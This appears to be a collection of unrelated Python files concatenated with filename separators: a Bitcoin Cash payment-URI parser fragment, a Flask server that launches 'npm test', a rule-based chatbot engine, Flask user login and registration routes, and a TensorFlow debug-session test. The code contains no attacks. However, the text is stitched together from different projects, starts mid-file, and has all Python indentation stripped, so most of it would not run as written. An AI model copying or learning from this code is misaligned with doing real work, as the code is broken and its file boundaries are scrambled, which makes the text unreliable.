# However existing code for Android and/or iOS may not be
# expecting this, so we will leave the original code here where
# it runs in the daemon thread context. :/
on_pr(request)
t = threading.Thread(target=get_payment_request_thread, daemon=True)
t.start()
if strict:
accept_keys = {'r', 'sig', 'name', 'address', 'amount', 'label', 'message', 'memo', 'op_return', 'op_return_raw', 'time', 'exp'}
extra_keys = set(out.keys()) - accept_keys
if extra_keys:
raise ExtraParametersInURIWarning(out, *tuple(extra_keys))
return out
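# Illustrative sketch (hypothetical URI): for a URI of the form
#   "bitcoincash:<cashaddr>?amount=0.001&message=hi"
# the returned dict is roughly
#   {'address': '<cashaddr>', 'amount': 100000, 'message': 'hi', 'memo': 'hi'}
# (0.001 BCH * COIN == 100000 satoshis), and with strict=True an extra unknown key
# such as foo=bar raises ExtraParametersInURIWarning carrying that dict plus the
# unrecognised key names.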
def check_www_dir(rdir):
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
server.py | from flask import Flask, render_template
import subprocess
import threading
app = Flask(__name__, template_folder=".", static_folder="assets")
# url_for('static', filename='assets')
def test_worker():
## Starting of the test
is_running = open('is_test_running','w')
is_running.write('True')
is_running.close()
cmd = ["npm","test"]
p = subprocess.Popen(cmd, stdout = subprocess.PIPE,stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
out,err = p.communicate()
output_report = open('output.txt', 'w')
output_report.write(out)
output_report.close()
## End of the test
is_running = open('is_test_running','w')
is_running.write('False')
is_running.close()
@app.route("/")
def index():
return render_template('index.html')
@app.route("/get_report")
def hello():
is_running = open('is_test_running','r')
out = is_running.read()
is_running.close()
if out == 'False':
return render_template('mochawesome.html')
else:
return "Please wait test is running"
@app.route("/is_running")
def is_running():
is_running = open('is_test_running','r')
out = is_running.read()
is_running.close()
return out
@app.route("/run_test")
def run_test():
try:
is_running = open('is_test_running','r')
out = is_running.read()
is_running.close()
except:
threading.Thread(target=test_worker).start()
return "Background Thread Started"
if out == 'False':
threading.Thread(target=test_worker).start()
return "Background Thread Started"
else:
return "Test already running"
if __name__ == "__main__" :
app.run()
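# Illustrative usage sketch of the endpoints above (assumes Flask's default port):
#   curl http://localhost:5000/run_test    -> "Background Thread Started"
#   curl http://localhost:5000/is_running  -> "True" while `npm test` is running
#   curl http://localhost:5000/get_report  -> mochawesome.html once the flag file reads "False"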
|
brain.py | from random import randint
import random
from Levenshtein import distance
from os import listdir
import json
from threading import Thread
from time import sleep
import time
from datetime import datetime
import re
# Import interface for basic convo file
from .utils import convo_reader
from .utils import story_reader
from .message_statistics import MessageStats
from .utils import sentiment
from .utils import iograb
# Get and instantiate knowledge graph object
from .knowledge_graph import KnowledgeGraph
knowledge = KnowledgeGraph()
# Config load
configFile = open('config.json')
raw_data = configFile.read()
data = json.loads(raw_data)
null_response = "None"
try:
null_response = data["null_response"]
except:
null_response = "None"
# Setup global objects
myIO = iograb.ClaraIO()
try:
if data['iomode'] == 'server':
port = 3000
try:
port = data['port']
except:
port = 3000
myIO = iograb.WebIO(port)
except:
doNothing = True
# Emotion load
emotionFile = open('emotions.json')
raw_data = emotionFile.read()
emotions = json.loads(raw_data)
emotionFile.close()
# Context load
try:
contextFile = open('context.json')
raw_data = contextFile.read()
context = json.loads(raw_data)
knowledge.loadContext(context)
contextFile.close()
except:
pass # Context file setup is not required
# Knowledge load
def load_knowledge():
global knowledge
knowledgeDir = data['knowledge_dir']
knowledgeFiles = listdir(data['knowledge_dir'])
for i in knowledgeFiles:
if i.endswith('.json'):
knowledgeFile = open(knowledgeDir + i)
raw_data = knowledgeFile.read()
knowledgeData = json.loads(raw_data)
knowledgeFile.close()
for q in knowledgeData['classifications']:
for j in q['classes']:
knowledge.addClassification(q['item'], j)
elif i.endswith('.knowledge'):
knowledgeFile = open(knowledgeDir + i)
raw_data = knowledgeFile.read()
for j in raw_data.split('\n'):
if len(j) > 0:
if j[0] == '#': # Comment line
continue
chunks = j.split('|')
for q in chunks[1].split(','):
knowledge.addClassification(chunks[0], q)
try:
load_knowledge()
except Exception as e:
print(e)
print('Knowledge load failed. Ensure you have the directory properly configured.')
convo = [] # Main array of all possible inputs and responses
analysisConvo = [] # Main array of diagnostic IO
# Var Setup
VAR_REGISTRY = {}
def build_registry():
global VAR_REGISTRY, convo, analysisConvo
VAR_REGISTRY = {
"user_name": data['user']['name'],
"name": data['name'],
"response_count": len(convo),
"user_hobby": data['user']['hobby'],
"happy_level": emotions['happy'],
"stress_level": emotions['stress'],
"animosity": emotions['animosity']
}
try:
VAR_REGISTRY['age'] = data['age']
except:
do_nothing = True
try:
VAR_REGISTRY['favorite_food'] = data['food']
except:
do_nothing = True
count = 0
for i in convo:
for j in i['starters']:
count += 1
VAR_REGISTRY['total_response_handles'] = count
feelings = json.load(open('feelings.json'))
for i in feelings:
VAR_REGISTRY[i['name']] = i['val']
# Add diagnostic info
toAdd = {
"starters": [ i['name'] + " level", "What is your " + i['name'] + "level?"],
"replies": [{ "text": "My " + i['name'] + " level is {" + i['name'] + "}." }]
}
convo += [toAdd]
analysisConvo += [toAdd]
# Finally add the current time to be updated every loop
VAR_REGISTRY['timeMilli'] = time.time()
now = datetime.now()
VAR_REGISTRY['hour'] = now.hour
VAR_REGISTRY['minute'] = now.minute
# Add all data to knowledge graph
knowledge.bulkPut(VAR_REGISTRY)
knowledge.addConnection('fulltime', [
{ 'type': 'connection', 'name': 'hour' },
{ 'type': 'string', 'text': ':' },
{ 'type': 'connection', 'name': 'minute' }
])
# Append all conversation responses from the distributed conversation files
# This allows one to "plug-in" new responses and have them centralized together
def load_convos():
global convo
convo = [] # Reset convos to prevent duplicates
convoDir = data['convo_dir']
convoFiles = listdir(data['convo_dir'])
# Replacement values
search = re.compile('%{.*}')
for i in convoFiles:
convo_json = []
if i.endswith('.json'):
convoFile = open(convoDir + i)
raw_data = convoFile.read()
convo_json = json.loads(raw_data)
elif i.endswith('.convo'):
# Process the loose file format
convoFile = open(convoDir + i)
raw_data = convoFile.read()
convo_json = convo_reader.convert_to_json(raw_data)
for i, value in enumerate(convo_json):
kill_list = []
for j, message in enumerate(value['starters']):
found = False
for match in re.finditer(search, message):
found = True
string = match.group(0)[2:-1]
for item in knowledge.classMembers(string):
convo_json[i]['starters'] += [message.replace(match.group(0), item)]
iters = 0
for q in kill_list: # Invariant: q always grows
del convo_json[i]['starters'][q - iters]
iters += 1
convo += convo_json
# Now load story convos
try:
storyFiles = listdir('stories/')
for i in storyFiles:
if i.endswith('.json'):
convo_json = story_reader.load_story('stories/' + i)
elif i.endswith('.story'):
convo_json = story_reader.load_storyfile('stories/' + i)
convo += convo_json
except:
pass
build_registry()
load_convos()
# Setup analysis mode
try:
analysisFile = open(data['convo_dir'] + 'diagnostics.convo')
raw_data = analysisFile.read()
analysisConvo += convo_reader.convert_to_json(raw_data)
except:
analysisConvo = []
def punctuation_stripper(statement):
toRemove = ['.', '!', '?']
punctuate = None
for i in toRemove:
if not statement.find(i) == -1:
punctuate = i
statement = statement.strip(i)
return {"text": statement, "punctuation": punctuate}
def handle_modifiers(modifiers):
for i in modifiers:
try:
VAR_REGISTRY[i['name']] += i['val']
knowledge.put(i['name'], i['val'])
except:
doNothing = True
def calc_qualifiers(qualifier):
#registryValue = VAR_REGISTRY[qualifier['name']]
registryValue = knowledge.get(qualifier['name'])
try:
if registryValue > qualifier['$gt']:
return True
else:
return False
except:
# Not a greater than qualifier
doNothing = True
try:
if registryValue == qualifier['$eq']:
return True
else:
return False
except:
# Not an equal to qualifier
doNothing = True
try:
if registryValue < qualifier['$lt']:
return True
else:
return False
except:
# Not a less than qualifier
doNothing = True
try:
if registryValue <= qualifier['$lte']:
return True
else:
return False
except:
# Not less than or equal qualifier
doNothing = True
try:
if registryValue >= qualifier['$gte']:
return True
else:
return False
except:
# Not greater than or equal qualifier
doNothing = True
# Legacy qualifier types
try:
if registryValue == qualifier['val']:
return True
else:
return False
except:
# Not a less than qualifier
doNothing = True
# if supplied info doesn't fit any of the above qualifier types reject
return False
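# Small illustrative example (hypothetical registry value): if
# knowledge.get('happy_level') == 5, the qualifier {'name': 'happy_level', '$gt': 3}
# makes calc_qualifiers return True, {'name': 'happy_level', '$lt': 3} returns False,
# and the legacy form {'name': 'happy_level', 'val': 5} tests simple equality.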
# Pick a random option from supplied reply list using weights
def random_pick_weighted(reply_options):
context_responses = []
relevant_context = False
for i in reply_options:
try:
relevant = False
for j in i['context']:
if knowledge.contextSeparation(j['name']) == 1 or j['starting'] == True:
relevant = True
if not j['name'] == 'general' and knowledge.contextSeparation(j['name']) == 1:
relevant_context = True
context_responses += [i]
return i # Prevent this reply from failing to be sent despite being applicable
if len(i['context']) == 0:
relevant = True
if not relevant:
reply_options.remove(i)
except:
pass # Don't remove
if relevant_context:
reply_options = context_responses # Overwrite with narrowed responses
weights = list(map(lambda e: e['weight'], reply_options))
indexes = list(range(0, len(reply_options)))
# Generates a list with a single entry containing a value randomly picked with proper weight
if (len(indexes) == 0):
return -1
choices_list = random.choices(indexes, weights=weights, k=1)
picked_index = choices_list[0]
slimmed_reply = reply_options[picked_index]
return slimmed_reply
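# Standalone sketch of the weighted pick used above (toy values only):
#   opts = [{'text': 'hi', 'weight': 3}, {'text': 'hey', 'weight': 1}]
#   random.choices(opts, weights=[o['weight'] for o in opts], k=1)[0]
# returns the 'hi' option roughly 75% of the time.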
def get_response(input):
knowledge.updateContext() # Move previous context into the past
sentimentValues = sentiment.assess(input)
# Remove currently useless characters
stripped = punctuation_stripper(input)
input = stripped["text"]
punctuation = stripped["punctuation"]
possibilities = []
for i in convo:
for a in i['starters']:
val = distance(input, a)
if len(input)/(val+1) > 1.5:
reply_options = []
for b in i['replies']:
should_add = False
try:
to_test = b['qualifiers']
for z in to_test:
if calc_qualifiers(z):
should_add = True
else:
do_nothing = True
except:
should_add = True
if should_add:
to_add = {'text': b['text']}
try:
to_add['image'] = b['image']
except:
to_add['image'] = 'None'
try:
to_add['modifiers'] = b['modifiers']
except:
to_add['modifiers'] = []
try:
to_add['context'] = b['context']
except:
to_add['context'] = []
try:
to_add['weight'] = b['weight']
except:
to_add['weight'] = 1
reply_options += [to_add]
slimmed_reply = random_pick_weighted(reply_options)
if slimmed_reply == -1:
return { 'message': 'None' }
possibilities.append({
'val': val,
'response': slimmed_reply['text'],
'image': slimmed_reply['image'],
'weight': slimmed_reply['weight'],
'modifiers': slimmed_reply['modifiers'],
'context': slimmed_reply['context']
})
min = 10000000000
response = 'None'
image = 'None'
modifiers = []
contexts = []
found_close_context = -1
# print(possibilities)
CONTEXT_THRESHOLD = 1 # Steps away a context is still relevant
for i in possibilities:
if i['val'] < min:
contexts = i['context']
context_this_turn = False
for q in contexts:
separation = knowledge.contextSeparation(q['name'])
if separation == CONTEXT_THRESHOLD:
found_close_context = 1
context_this_turn = True
if (found_close_context == -1) or context_this_turn: # If context override close matching
response = i['response']
image = i['image']
modifiers = i['modifiers']
min = i['val']
handle_modifiers(modifiers)
# Update context waiting
for i in contexts:
# If kicking off or continuing the train
if i['starting'] == True or knowledge.contextSeparation(i['name']) == CONTEXT_THRESHOLD:
knowledge.newContext(i['name'])
knowledge.newContext('general') # This is a persistent context that enables something to always be selected
formatValues = knowledge.getRegistry()
toReturn = {'message': response.format(**formatValues), 'image': image}
return toReturn
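# Worked example of the matching threshold above (hypothetical strings): for the
# input "hello there" (11 chars) and the starter "hello here" the Levenshtein
# distance is 1, so 11 / (1 + 1) = 5.5 > 1.5 and that starter's replies are
# considered; a distance of 7 would give 11 / 8 ~= 1.4 and be skipped.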
input_queue = []
def threaded_input():
while True:
if len(input_queue) == 0:
newInput = myIO.get()
input_queue.append({ 'text': newInput['text'], 'session': newInput['session'] });
ticker = 0
events = json.load(open('events.json'))
for i in range(len(events)):
try:
metric = events[i]['metric']
#val = VAR_REGISTRY[metric]
val = knowledge.get(metric)
# Make the event support the multievent format
events[i]['metrics'] = [events[i]]
events[i]['metrics'][0]['last'] = val
except:
# Multitrigger event
metrics = events[i]['metrics']
for j in range(len(metrics)):
# val = VAR_REGISTRY[metrics[j]['metric']]
val = knowledge.get(metrics[j]['metric'])
events[i]['metrics'][j]['last'] = val
def event_check():
global ticker
ticker += 1
# Update time
VAR_REGISTRY['timeMilli'] = time.time()
knowledge.put('timeMilli', time.time());
now = datetime.now()
VAR_REGISTRY['hour'] = now.hour
knowledge.put('hour', now.hour);
VAR_REGISTRY['minute'] = now.minute
knowledge.put('minute', now.minute)
for i in range(len(events)):
triggers = events[i]['metrics']
# Innocent until proven guilty
isActivated = True
for j in range(len(triggers)):
metric = triggers[j]['metric']
#val = VAR_REGISTRY[metric]
val = knowledge.get(metric)
if val == None:
val = knowledge.contextSeparation(metric)
if triggers[j]['last']:
if triggers[j]['type'] == '$gt':
if not (val > triggers[j]['level'] and triggers[j]['last'] < val):
isActivated = False
elif triggers[j]['type'] == '$lt':
if not (val < triggers[j]['level'] and triggers[j]['last'] > val):
isActivated = False
elif triggers[j]['type'] == '$eq':
if not (val == triggers[j]['level'] and not triggers[j]['last'] == val):
isActivated = False
else:
isActivated = False
events[i]['metrics'][j]['last'] = val
if isActivated:
myIO.put(events[i]['response'])
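# Illustrative events.json entry (hypothetical values): something like
#   {"metric": "stress_level", "type": "$gt", "level": 10, "response": "I need a break."}
# fires its response on a tick where stress_level is above 10 and has risen since
# the previous reading remembered in 'last'.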
# Runtime flags
analysisMode = False
def master_command(text):
global analysisMode
if text == 'analysis mode':
analysisMode = True
return True
return False
def run():
global convo, analysisMode, knowledge
logFile = open('log.txt', 'a')
secureLogger = MessageStats("secure_log.json")
secureLogger.load_log()
myIO.put("Booting...")
ioThread = Thread(target = threaded_input)
myIO.put("{} online.".format(data['name']))
ioThread.start()
terminated = False
while not terminated:
event_check()
if len(input_queue) > 0:
statement = input_queue[0]['text']
session = input_queue[0]['session']
del input_queue[0]
master_command(statement.lower())
if statement == 'reload':
load_knowledge()
load_convos()
myIO.put('Refreshing convos...', session)
continue
if not analysisMode:
response = get_response(statement.lower())
elif analysisMode:
backConvo = convo
convo = analysisConvo
response = get_response(statement.lower())
convo = backConvo
if not response['message'] == 'None':
myIO.put(response['message'], session)
else:
myIO.put(null_response, session)
secureLogger.log_occurence(response['message'])
ender = '\n'
logFile.write('Q: ' + statement + ender)
if not response == None:
logFile.write('R: ' + response['message'] + ender)
else:
logFile.write('R: None' + ender)
if statement == "quit":
print('Shutting down...')
terminated = True
sleep(0.1)
# Save context
contextFile = open('context.json', 'w')
contextFile.write(json.dumps(knowledge.dumpContext()))
contextFile.close()
# Save emotions
emotionFile = open('emotions.json', 'w')
emotionFile.write(json.dumps(emotions))
emotionFile.close()
secureLogger.save_log()
if __name__ == "__main__":
run()
|
routes.py | from . import users_blueprint
from flask import render_template, flash, abort, request, current_app, redirect, url_for
from .forms import RegistrationForm, LoginForm
from project.models import User
from project import database, mail
from sqlalchemy.exc import IntegrityError
from flask import escape
from flask_login import login_user, current_user, login_required, logout_user
from urllib.parse import urlparse
from flask_mail import Message
from flask import copy_current_request_context
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from itsdangerous.exc import BadSignature
from datetime import datetime
################
#### routes ####
################
@users_blueprint.route('/about')
def about():
flash('Thanks for learning about this site!', 'info')
return render_template('users/about.html', company_name='saidulislam.com')
@users_blueprint.route('/admin')
def admin():
abort(403)
@users_blueprint.errorhandler(403)
def page_forbidden(e):
return render_template('users/403.html'), 403
@users_blueprint.route('/register', methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if request.method == 'POST':
if form.validate_on_submit():
try:
new_user = User(form.email.data, form.password.data)
database.session.add(new_user)
database.session.commit()
flash(f'Thanks for registering, {new_user.email}! Please check your email to confirm your email address.', 'success')
current_app.logger.info(f'Registered new user: {form.email.data}!')
@copy_current_request_context
def send_email(message):
with current_app.app_context():
mail.send(message)
# Send an email confirming the new registration - Updated!
msg = generate_confirmation_email(form.email.data)
email_thread = Thread(target=send_email, args=[msg])
email_thread.start()
return redirect(url_for('users.login'))
except IntegrityError:
database.session.rollback()
flash(f'ERROR! Email ({form.email.data}) already exists.', 'error')
else:
flash(f"Error in form data!")
return render_template('users/register.html', form=form)
@users_blueprint.route('/login', methods=['GET', 'POST'])
def login():
# If the user is already logged in, don't allow them to try to log in again
if current_user.is_authenticated:
flash('Already logged in!')
current_app.logger.info(f'Duplicate login attempt by user: {current_user.email}')
return redirect(url_for('stocks.index'))
form = LoginForm()
if request.method == 'POST':
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user and user.is_password_correct(form.password.data):
# User's credentials have been validated, so log them in
login_user(user, remember=form.remember_me.data)
flash(f'Thanks for logging in, {current_user.email}!')
current_app.logger.info(f'Logged in user: {current_user.email}')
# If the next URL is not specified, redirect to the user profile - NEW!!
if not request.args.get('next'):
return redirect(url_for('users.user_profile'))
# Process the query to determine if the user should be redirected after logging in - NEW!!
next_url = request.args.get('next')
if urlparse(next_url).scheme != '' or urlparse(next_url).netloc != '':
current_app.logger.info(f'Invalid next path in login request: {next_url}')
logout_user()
return abort(400)
current_app.logger.info(f'Redirecting after valid login to: {next_url}')
return redirect(next_url)
flash('ERROR! Incorrect login credentials.')
return render_template('users/login.html', form=form)
@users_blueprint.route('/logout')
@login_required
def logout():
current_app.logger.info(f'Logged out user: {current_user.email}')
logout_user()
flash('Goodbye!')
return redirect(url_for('stocks.index'))
@users_blueprint.route('/profile')
@login_required
def user_profile():
return render_template('users/profile.html')
def generate_confirmation_email(user_email):
confirm_serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
confirm_url = url_for('users.confirm_email',
token=confirm_serializer.dumps(user_email, salt='email-confirmation-salt'),
_external=True)
return Message(subject='Flask Stock Portfolio App - Confirm Your Email Address',
html=render_template('users/email_confirmation.html', confirm_url=confirm_url),
recipients=[user_email])
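# Minimal sketch (illustrative only, not application code) of how the token above
# round-trips with itsdangerous:
#   s = URLSafeTimedSerializer('some-secret-key')
#   token = s.dumps('user@example.com', salt='email-confirmation-salt')
#   s.loads(token, salt='email-confirmation-salt', max_age=3600)  # -> 'user@example.com'
# loads() raises BadSignature (or its SignatureExpired subclass) if the token is
# tampered with or older than max_age seconds.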
@users_blueprint.route('/confirm/<token>')
def confirm_email(token):
try:
confirm_serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
email = confirm_serializer.loads(token, salt='email-confirmation-salt', max_age=3600)
except BadSignature as e:
flash(f'The confirmation link is invalid or has expired.', 'error')
current_app.logger.info(f'Invalid or expired confirmation link received from IP address: {request.remote_addr}')
return redirect(url_for('users.login'))
user = User.query.filter_by(email=email).first()
if user.email_confirmed:
flash('Account already confirmed. Please login.', 'info')
current_app.logger.info(f'Confirmation link received for a confirmed user: {user.email}')
else:
user.email_confirmed = True
user.email_confirmed_on = datetime.now()
database.session.add(user)
database.session.commit()
flash('Thank you for confirming your email address!', 'success')
current_app.logger.info(f'Email address confirmed for: {user.email}')
return redirect(url_for('stocks.index')) |
framework_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Framework of debug-wrapped sessions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import tempfile
import threading
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.wrappers import framework
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestDebugWrapperSession(framework.BaseDebugWrapperSession):
"""A concrete implementation of BaseDebugWrapperSession for test."""
def __init__(self, sess, dump_root, observer, thread_name_filter=None):
# Supply dump root.
self._dump_root = dump_root
# Supply observer.
self._obs = observer
# Invoke superclass constructor.
framework.BaseDebugWrapperSession.__init__(
self, sess, thread_name_filter=thread_name_filter)
def on_session_init(self, request):
"""Override abstract on-session-init callback method."""
self._obs["sess_init_count"] += 1
self._obs["request_sess"] = request.session
return framework.OnSessionInitResponse(
framework.OnSessionInitAction.PROCEED)
def on_run_start(self, request):
"""Override abstract on-run-start callback method."""
self._obs["on_run_start_count"] += 1
self._obs["run_fetches"] = request.fetches
self._obs["run_feed_dict"] = request.feed_dict
return framework.OnRunStartResponse(
framework.OnRunStartAction.DEBUG_RUN,
["file://" + self._dump_root])
def on_run_end(self, request):
"""Override abstract on-run-end callback method."""
self._obs["on_run_end_count"] += 1
self._obs["performed_action"] = request.performed_action
self._obs["tf_error"] = request.tf_error
return framework.OnRunEndResponse()
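# Note on the callback flow exercised below (summarising this file only): a
# wrapper.run(fetch) call goes on_run_start -> wrapped Session.run -> on_run_end,
# and because on_run_start above answers with OnRunStartAction.DEBUG_RUN plus a
# "file://" dump URL, each run also writes a dump that DebugDumpDir can read back.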
class TestDebugWrapperSessionBadAction(framework.BaseDebugWrapperSession):
"""A concrete implementation of BaseDebugWrapperSession for test.
This class intentionally puts a bad action value in OnSessionInitResponse
and/or in OnRunStartAction to test the handling of such invalid cases.
"""
def __init__(
self,
sess,
bad_init_action=None,
bad_run_start_action=None,
bad_debug_urls=None):
"""Constructor.
Args:
sess: The TensorFlow Session object to be wrapped.
bad_init_action: (str) bad action value to be returned during the
on-session-init callback.
bad_run_start_action: (str) bad action value to be returned during the
on-run-start callback.
bad_debug_urls: Bad URL values to be returned during the on-run-start
callback.
"""
self._bad_init_action = bad_init_action
self._bad_run_start_action = bad_run_start_action
self._bad_debug_urls = bad_debug_urls
# Invoke superclass constructor.
framework.BaseDebugWrapperSession.__init__(self, sess)
def on_session_init(self, request):
if self._bad_init_action:
return framework.OnSessionInitResponse(self._bad_init_action)
else:
return framework.OnSessionInitResponse(
framework.OnSessionInitAction.PROCEED)
def on_run_start(self, request):
debug_urls = self._bad_debug_urls or []
if self._bad_run_start_action:
return framework.OnRunStartResponse(
self._bad_run_start_action, debug_urls)
else:
return framework.OnRunStartResponse(
framework.OnRunStartAction.DEBUG_RUN, debug_urls)
def on_run_end(self, request):
return framework.OnRunEndResponse()
class DebugWrapperSessionTest(test_util.TensorFlowTestCase):
def setUp(self):
self._observer = {
"sess_init_count": 0,
"request_sess": None,
"on_run_start_count": 0,
"run_fetches": None,
"run_feed_dict": None,
"on_run_end_count": 0,
"performed_action": None,
"tf_error": None,
}
self._dump_root = tempfile.mkdtemp()
self._sess = session.Session()
self._a_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
self._b_init_val = np.array([[2.0], [-1.0]])
self._c_val = np.array([[-4.0], [6.0]])
self._a_init = constant_op.constant(
self._a_init_val, shape=[2, 2], name="a_init")
self._b_init = constant_op.constant(
self._b_init_val, shape=[2, 1], name="b_init")
self._ph = array_ops.placeholder(dtype=dtypes.float64, name="ph")
self._a = variables.Variable(self._a_init, name="a1")
self._b = variables.Variable(self._b_init, name="b")
self._c = constant_op.constant(self._c_val, shape=[2, 1], name="c")
# Matrix product of a and b.
self._p = math_ops.matmul(self._a, self._b, name="p1")
# Matrix product of a and ph.
self._q = math_ops.matmul(self._a, self._ph, name="q")
# Sum of two vectors.
self._s = math_ops.add(self._p, self._c, name="s")
# Initialize the variables.
self._sess.run(self._a.initializer)
self._sess.run(self._b.initializer)
def tearDown(self):
# Tear down temporary dump directory.
if os.path.isdir(self._dump_root):
shutil.rmtree(self._dump_root)
ops.reset_default_graph()
def testSessionInit(self):
self.assertEqual(0, self._observer["sess_init_count"])
wrapper_sess = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
# Assert that on-session-init callback is invoked.
self.assertEqual(1, self._observer["sess_init_count"])
# Assert that the request to the on-session-init callback carries the
# correct session object.
self.assertEqual(self._sess, self._observer["request_sess"])
# Verify that the wrapper session implements the session.SessionInterface.
self.assertTrue(isinstance(wrapper_sess, session.SessionInterface))
self.assertEqual(self._sess.sess_str, wrapper_sess.sess_str)
self.assertEqual(self._sess.graph, wrapper_sess.graph)
self.assertEqual(self._sess.graph_def, wrapper_sess.graph_def)
# Check that the partial_run_setup and partial_run are not implemented for
# the debug wrapper session.
with self.assertRaises(NotImplementedError):
wrapper_sess.partial_run_setup(self._p)
def testInteractiveSessionInit(self):
"""The wrapper should work also on other subclasses of session.Session."""
TestDebugWrapperSession(
session.InteractiveSession(), self._dump_root, self._observer)
def testSessionRun(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer)
# Check initial state of the observer.
self.assertEqual(0, self._observer["on_run_start_count"])
self.assertEqual(0, self._observer["on_run_end_count"])
s = wrapper.run(self._s)
# Assert the run return value is correct.
self.assertAllClose(np.array([[3.0], [4.0]]), s)
# Assert the on-run-start method is invoked.
self.assertEqual(1, self._observer["on_run_start_count"])
# Assert the on-run-start request reflects the correct fetch.
self.assertEqual(self._s, self._observer["run_fetches"])
# Assert the on-run-start request reflects the correct feed_dict.
self.assertIsNone(self._observer["run_feed_dict"])
# Assert the file debug URL has led to dump on the filesystem.
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertEqual(7, len(dump.dumped_tensor_data))
# Assert the on-run-end method is invoked.
self.assertEqual(1, self._observer["on_run_end_count"])
# Assert the performed action field in the on-run-end callback request is
# correct.
self.assertEqual(
framework.OnRunStartAction.DEBUG_RUN,
self._observer["performed_action"])
# No TensorFlow runtime error should have happened.
self.assertIsNone(self._observer["tf_error"])
def testSessionInitInvalidSessionType(self):
"""Attempt to wrap a non-Session-type object should cause an exception."""
wrapper = TestDebugWrapperSessionBadAction(self._sess)
with self.assertRaisesRegexp(TypeError, "Expected type .*; got type .*"):
TestDebugWrapperSessionBadAction(wrapper)
def testSessionInitBadActionValue(self):
with self.assertRaisesRegexp(
ValueError, "Invalid OnSessionInitAction value: nonsense_action"):
TestDebugWrapperSessionBadAction(
self._sess, bad_init_action="nonsense_action")
def testRunStartBadActionValue(self):
wrapper = TestDebugWrapperSessionBadAction(
self._sess, bad_run_start_action="nonsense_action")
with self.assertRaisesRegexp(
ValueError, "Invalid OnRunStartAction value: nonsense_action"):
wrapper.run(self._s)
def testRunStartBadURLs(self):
# debug_urls ought to be a list of str, not a str. So an exception should
# be raised during a run() call.
wrapper = TestDebugWrapperSessionBadAction(
self._sess, bad_debug_urls="file://foo")
with self.assertRaisesRegexp(TypeError, "Expected type .*; got type .*"):
wrapper.run(self._s)
def testErrorDuringRun(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
# No matrix size mismatch.
self.assertAllClose(
np.array([[11.0], [-1.0]]),
wrapper.run(self._q, feed_dict={self._ph: np.array([[1.0], [2.0]])}))
self.assertEqual(1, self._observer["on_run_end_count"])
self.assertIsNone(self._observer["tf_error"])
# Now there should be a matrix size mismatch error.
wrapper.run(self._q, feed_dict={self._ph: np.array([[1.0], [2.0], [3.0]])})
self.assertEqual(2, self._observer["on_run_end_count"])
self.assertTrue(
isinstance(self._observer["tf_error"], errors.InvalidArgumentError))
def testUsingWrappedSessionShouldWorkAsContextManager(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
with wrapper as sess:
sess.run(self._s)
def testUsingWrappedSessionShouldSupportEvalWithAsDefault(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
with wrapper.as_default():
foo = constant_op.constant(42, name="foo")
self.assertEqual(42, foo.eval())
self.assertEqual(foo, self._observer["run_fetches"])
def testWrapperShouldSupportSessionClose(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
wrapper.close()
def testWrapperThreadNameFilterMainThread(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer,
thread_name_filter="MainThread")
child_run_output = []
def child_thread_job():
child_run_output.append(wrapper.run(self._b_init))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
self.assertAllClose(self._a_init_val, wrapper.run(self._a_init))
thread.join()
self.assertAllClose([self._b_init_val], child_run_output)
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertEqual(1, dump.size)
self.assertEqual("a_init", dump.dumped_tensor_data[0].node_name)
def testWrapperThreadNameFilterChildThread(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer,
thread_name_filter=r"Child.*")
child_run_output = []
def child_thread_job():
child_run_output.append(wrapper.run(self._b_init))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
self.assertAllClose(self._a_init_val, wrapper.run(self._a_init))
thread.join()
self.assertAllClose([self._b_init_val], child_run_output)
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertEqual(1, dump.size)
self.assertEqual("b_init", dump.dumped_tensor_data[0].node_name)
